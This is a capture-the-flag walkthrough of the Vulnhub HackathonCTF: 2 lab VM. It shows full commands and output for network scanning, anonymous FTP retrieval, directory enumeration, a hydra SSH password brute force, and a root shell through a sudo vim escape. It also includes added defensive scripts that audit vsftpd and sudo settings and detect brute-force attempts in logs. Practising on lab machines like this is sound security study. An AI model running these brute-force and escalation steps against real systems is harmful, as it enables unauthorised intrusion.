Vulnhub: Hackathon 2 target machine, detailed walkthrough

Hackathon 2

Author: jason_huawen

Basic information about the target machine

Name: HackathonCTF: 2

Address: https://www.vulnhub.com/entry/hackathonctf-2,714/

Identifying the target host's IP address

Because the target host cannot obtain an IP address from VirtualBox automatically, refer to my other article for the fix, then continue with the steps below.

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.88.0/16   |   Screen View: Unique Hosts        
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:f0:cf:82      1      60  PCS Systemtechnik GmbH   
 192.168.56.208  08:00:27:57:0d:35      1      60  PCS Systemtechnik GmbH   

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.208.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 02:52 EST
Nmap scan report for bogon (192.168.56.208)
Host is up (0.00025s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 1000     1000           47 Jun 18  2021 flag1.txt
|_-rw-r--r--    1 1000     1000          849 Jun 19  2021 word.dir
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_*/
|_http-title: hackathon2
|_http-server-header: Apache/2.4.41 (Ubuntu)
7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 70:4a:a9:69:c2:d1:68:23:86:bd:85:83:31:ca:80:0c (RSA)
|   256 a6:9e:a4:18:ad:a4:2b:7e:ea:f8:5e:63:29:6e:4f:24 (ECDSA)
|_  256 4e:db:a6:d2:eb:b9:53:a5:d7:21:0b:4e:57:a5:f5:c1 (ED25519)
MAC Address: 08:00:27:57:0D:35 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds

The NMAP scan shows that the target host has 3 open ports: 21 (FTP), 80 (HTTP) and 7223 (SSH).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ ftp 192.168.56.208
Connected to 192.168.56.208.
220 (vsFTPd 3.0.3)
Name (192.168.56.208:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||13877|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        118          4096 Jun 19  2021 .
drwxr-xr-x    2 0        118          4096 Jun 19  2021 ..
-rw-r--r--    1 1000     1000           47 Jun 18  2021 flag1.txt
-rw-r--r--    1 1000     1000          849 Jun 19  2021 word.dir
226 Directory send OK.
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
229 Entering Extended Passive Mode (|||45756|)
150 Opening BINARY mode data connection for flag1.txt (47 bytes).
100% |********************************|    47       51.86 KiB/s    00:00 ETA
226 Transfer complete.
47 bytes received in 00:00 (32.29 KiB/s)
ftp> get word.dir
local: word.dir remote: word.dir
229 Entering Extended Passive Mode (|||12119|)
150 Opening BINARY mode data connection for word.dir (849 bytes).
100% |********************************|   849        1.53 MiB/s    00:00 ETA
226 Transfer complete.
849 bytes received in 00:00 (945.38 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ cat flag1.txt 
₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc684}
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ cat word.dir 
happy
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
...

This looks like a password dictionary, or perhaps a directory wordlist?
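The only reason flag1.txt and the wordlist were readable is that vsftpd accepts anonymous logins (the ftp-anon script and the ftp-syst status above show this, including plaintext control and data connections). As an added example that is not part of the original write-up, here is a small audit of a vsftpd.conf for exactly those settings; both sample configurations are constructed, and the defaults used for keys that are not set are taken from the vsftpd.conf(5) manual page.

```python
# Added example (not from the write-up): audit a vsftpd.conf for the settings
# that let an unauthenticated client list and download the FTP root, as on the
# target box. Sample configurations below are constructed for illustration.
from typing import Dict, List

# Compiled-in defaults for the keys the audit cares about (vsftpd.conf(5)).
VSFTPD_DEFAULTS: Dict[str, str] = {
    "anonymous_enable": "YES",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "ssl_enable": "NO",
}


def parse_vsftpd_conf(text: str) -> Dict[str, str]:
    """Parse key=value lines on top of the defaults; '#' starts a comment."""
    settings = dict(VSFTPD_DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def audit_vsftpd(text: str) -> List[str]:
    """Return one finding per risky setting; an empty list means no finding."""
    s = {k: v.upper() for k, v in parse_vsftpd_conf(text).items()}
    findings: List[str] = []
    if s["anonymous_enable"] == "YES":
        findings.append("anonymous_enable=YES: unauthenticated clients can log in "
                        "and read everything under the anonymous FTP root")
        # Uploads need write_enable as well as the anon_* switch.
        if s["write_enable"] == "YES" and s["anon_upload_enable"] == "YES":
            findings.append("anon_upload_enable=YES: anonymous clients can upload files")
        if s["write_enable"] == "YES" and s["anon_mkdir_write_enable"] == "YES":
            findings.append("anon_mkdir_write_enable=YES: anonymous clients can create directories")
    if s["ssl_enable"] != "YES":
        findings.append("ssl_enable is not YES: credentials and data travel in plaintext")
    return findings


# Constructed: resembles what the scan of the target suggests (anonymous, plaintext).
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
"""

# Constructed: anonymous access off, TLS on; local users unchanged.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=YES
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit_vsftpd(conf) or ["no findings"]:
            print("  -", finding)
```

Note that an empty configuration is not safe: with no keys set, the compiled-in default enables anonymous logins, which is why the audit starts from the defaults rather than from an empty dictionary.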

Next, take a look at port 80:

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ curl http://192.168.56.208       

<!DOCTYPE html>
<html>
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous"></head>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
        <style>
                img {
  display: block;
  margin-left: auto;
  margin-right: auto;
  
  width:30%;
}
td{
        display: block;
}

h1{
        text-align: center;
}

        </style>
<head>
        <title>hackathon2</title>
</head>
<body>
        <table>
                 <br><br><br><br>
                <tr class=" ">
                        <img src="img1.png" alt="image1">
                        <h1>@nohtakcah</h1>
                </tr>
                <br><br><br>

                <td>
                        <i class="fab fa-twitter"><a href="https://twitter.com/Markme_1">doBash</a></i>
                </td>
                <td>
                        <i class="fab fa-twitter"><a href="https://twitter.com/The_NIL_is_here">The_TurtleHermit</a></i>
                </td>



        </table>

  
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ curl http://192.168.56.208/robots.txt
user-agent:*
disallow: */

user-agent:*
disallow: */

user-agent:*

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                       
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/22 03:05:10 Starting gobuster in directory enumeration mode
===============================================================
/happy                (Status: 200) [Size: 110]
/server-status        (Status: 403) [Size: 279]
Progress: 213848 / 220561 (96.96%)===============================================================
2022/11/22 03:05:26 Finished
==============================================================

Gobuster found the happy directory; let's access it:

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ curl http://192.168.56.208/happy     
<html>
<title>happy</title>

<body><h1> Nothing is in here</h1></body>

<!-- username: hackathonll >

</html>

The returned page source contains a comment that looks like a username. Let's try brute-forcing with hydra, combining it with the password dictionary obtained earlier:

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ hydra -l hackathonll -P word.dir ssh://192.168.56.208:7223            
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-22 03:09:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 110 login tries (l:1/p:110), ~7 tries per task
[DATA] attacking ssh://192.168.56.208:7223/
[7223][ssh] host: 192.168.56.208   login: hackathonll   password: Ti@gO
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-22 03:09:15

The password was found, so log in to the target host over SSH.
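From the defender's side, the hydra run above leaves a very recognisable trace: a burst of "Failed password" entries from one source within a few seconds, followed by an "Accepted password" for the same account, and moving sshd to port 7223 does nothing to change that. As an added example that is not part of the original write-up, the following detector parses sshd lines in the syslog format Ubuntu 20.04 writes to /var/log/auth.log and flags sources that exceed a failure threshold inside a sliding window. The log lines are constructed (the year is not present in syslog timestamps, so it is passed in as an assumed parameter); the attacking address 192.168.56.206 is the one the FTP status line above reported.

```python
# Added example (not from the write-up): flag SSH password brute-force attempts
# in sshd auth.log lines and note whether a success followed the failures.
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample log: six failures from one host in 12 s, then a success,
# plus one isolated failure from another host.
SAMPLE_AUTH_LOG = """\
Nov 22 03:09:03 hackathon sshd[1201]: Failed password for hackathonll from 192.168.56.206 port 51822 ssh2
Nov 22 03:09:03 hackathon sshd[1202]: Failed password for hackathonll from 192.168.56.206 port 51824 ssh2
Nov 22 03:09:04 hackathon sshd[1203]: Failed password for hackathonll from 192.168.56.206 port 51826 ssh2
Nov 22 03:09:06 hackathon sshd[1204]: Failed password for invalid user admin from 192.168.56.206 port 51828 ssh2
Nov 22 03:09:09 hackathon sshd[1205]: Failed password for hackathonll from 192.168.56.206 port 51830 ssh2
Nov 22 03:09:15 hackathon sshd[1206]: Failed password for hackathonll from 192.168.56.206 port 51832 ssh2
Nov 22 03:09:15 hackathon sshd[1250]: Accepted password for hackathonll from 192.168.56.206 port 51900 ssh2
Nov 22 03:30:00 hackathon sshd[1300]: Failed password for alice from 192.168.56.1 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

# (timestamp, source ip, user, accepted?)
Event = Tuple[datetime, str, str, bool]


def parse_auth_log(text: str, year: int = 2022) -> List[Event]:
    """Extract password-auth events; syslog has no year, so one is assumed."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd/PAM lines are not needed here
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def detect_bruteforce(events: List[Event], threshold: int = 10,
                      window_seconds: int = 60) -> Dict[str, dict]:
    """Return {ip: summary} for sources with >= threshold failures in any window."""
    by_ip: Dict[str, List[Event]] = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)

    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        fails = [ts for ts, _, _, ok in evs if not ok]
        burst, start = False, 0
        for end in range(len(fails)):  # sliding window over sorted failure times
            while (fails[end] - fails[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        first_fail = fails[0]
        alerts[ip] = {
            "failures": len(fails),
            "users": sorted({user for _, _, user, ok in evs if not ok}),
            # A success after the burst means the guessed credential worked.
            "success_after_failures": any(ok and ts >= first_fail for ts, _, _, ok in evs),
        }
    return alerts


if __name__ == "__main__":
    for ip, summary in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG), 5, 60).items():
        print(ip, summary)
```

The threshold of 5 failures in 60 seconds used in the usage call is an assumption chosen to match the short constructed sample; hydra's default of 16 parallel tasks produces far more than that per minute, so a production threshold can be higher while still catching it. The "success_after_failures" flag is the one to page on: it separates a noisy scanner from an account that was actually compromised.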

┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ ssh hackathonll@192.168.56.208 -p 7223
The authenticity of host '[192.168.56.208]:7223 ([192.168.56.208]:7223)' can't be established.
ED25519 key fingerprint is SHA256:kVyS5RqS8tFczs71LETg90vnsj/ZLDrqbn91uPP1Cik.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.208]:7223' (ED25519) to the list of known hosts.
hackathonll@192.168.56.208's password: 
Permission denied, please try again.
hackathonll@192.168.56.208's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 22 Nov 2022 04:11:10 PM UTC

  System load:  0.0                Processes:                184
  Usage of /:   23.3% of 18.57GB   Users logged in:          0
  Memory usage: 13%                IPv4 address for enp0s17: 192.168.56.208
  Swap usage:   0%


67 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Jun 19 05:35:15 2021 from 10.0.0.110
$ id
uid=1001(hackathonll) gid=1001(hackathonll) groups=1001(hackathonll)
$ pwd
/home/hackathonll
$ ls -alh
total 28K
drwxr-xr-x 3 hackathonll hackathonll 4.0K Jun 18  2021 .
drwxr-xr-x 4 root        root        4.0K Jun 18  2021 ..
-rw------- 1 hackathonll hackathonll   43 Jun 18  2021 .bash_history
-rw-r--r-- 1 hackathonll hackathonll  220 Jun 18  2021 .bash_logout
-rw-r--r-- 1 hackathonll hackathonll 3.7K Jun 18  2021 .bashrc
drwx------ 2 hackathonll hackathonll 4.0K Jun 18  2021 .cache
-rw-r--r-- 1 hackathonll hackathonll  807 Jun 18  2021 .profile
$ cat .bash_history
ls
sudo -i
sudo -l
sudo -i
sudo -l
sudo -i
$ 

Privilege escalation

$ sudo -l
Matching Defaults entries for hackathonll on hackathon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim
$ 

$ sudo /usr/bin/vim -c ':!/bin/sh'

# cd /root
# ls -alh
total 36K
drwx------  5 root root 4.0K Jun 18  2021 .
drwxr-xr-x 20 root root 4.0K Jun 18  2021 ..
-rw-------  1 root root 2.4K Jun 19  2021 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
-rw-r--r--  1 root root   47 Jun 18  2021 flag2.txt
drwxr-xr-x  3 root root 4.0K Jun 18  2021 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwxr-xr-x  3 root root 4.0K Jun 18  2021 snap
drwx------  2 root root 4.0K Jun 18  2021 .ssh
# cat flag2.txt
₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc694}
# 

Privilege escalation succeeded!
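The root cause of the escalation is the sudoers rule itself: granting vim as root with NOPASSWD is the same as granting a root shell, because an interactive editor can run arbitrary commands. As an added example that is not part of the original write-up, the script below parses the output of sudo -l (the text above is used as the sample) and flags rules that hand out root through a binary with a built-in command or shell escape. The set of such binaries is an assumption limited to well-known editors, pagers and interpreters; the second sample rule, which uses sudoedit instead, is constructed to show a rule the audit accepts.

```python
# Added example (not from the write-up): audit `sudo -l` output for rules that
# are equivalent to a root shell. The sample texts are from the write-up
# (the vim rule) and constructed (the sudoedit rule).
import os
import re
from typing import Dict, List

# Assumption: a short list of binaries known to let the user run other commands
# from inside them (editors, pagers, interpreters). vim, the rule on the target
# box, is the case the write-up demonstrates.
SHELL_ESCAPE_CAPABLE = {"vim", "vi", "nano", "less", "more", "man",
                        "python3", "perl", "bash", "sh"}

# One rule line: "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for hackathonll on hackathon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim
"""

# Constructed: editing a specific file through sudoedit keeps the editor
# running as the invoking user, so no shell escape reaches root.
SAMPLE_SUDO_L_FIXED = """\
User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: sudoedit /etc/motd
"""


def parse_sudo_l(text: str) -> List[Dict]:
    """Return one dict per command granted after the 'may run' header."""
    rules: List[Dict] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m["runas"].split(":")[0].strip()   # "(root : root)" -> root
        tags = re.findall(r"[A-Z]+(?=:)", m["tags"])    # e.g. ["NOPASSWD"]
        for cmd in m["cmds"].split(", "):
            rules.append({"runas": runas_user, "tags": tags, "command": cmd.strip()})
    return rules


def audit_sudo_rules(rules: List[Dict]) -> List[Dict]:
    """Flag rules that amount to root: ALL, or a shell-escape-capable binary."""
    findings: List[Dict] = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        if r["command"] == "ALL":
            reason = "unrestricted root"
        else:
            binary = os.path.basename(r["command"].split()[0])
            if binary not in SHELL_ESCAPE_CAPABLE:
                continue
            reason = f"{binary} can run other commands, so the rule equals a root shell"
        findings.append({"command": r["command"],
                         "nopasswd": "NOPASSWD" in r["tags"],
                         "reason": reason})
    return findings


if __name__ == "__main__":
    for text in (SAMPLE_SUDO_L, SAMPLE_SUDO_L_FIXED):
        print(audit_sudo_rules(parse_sudo_l(text)) or "no findings")
```

When the goal really is "let this user edit one file as root", sudoedit with the file path is the form to grant; when the goal is a maintenance task, grant the specific non-interactive command with its arguments rather than a general-purpose tool.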

Posted 2022-11-22 17:03 by Jason_huawen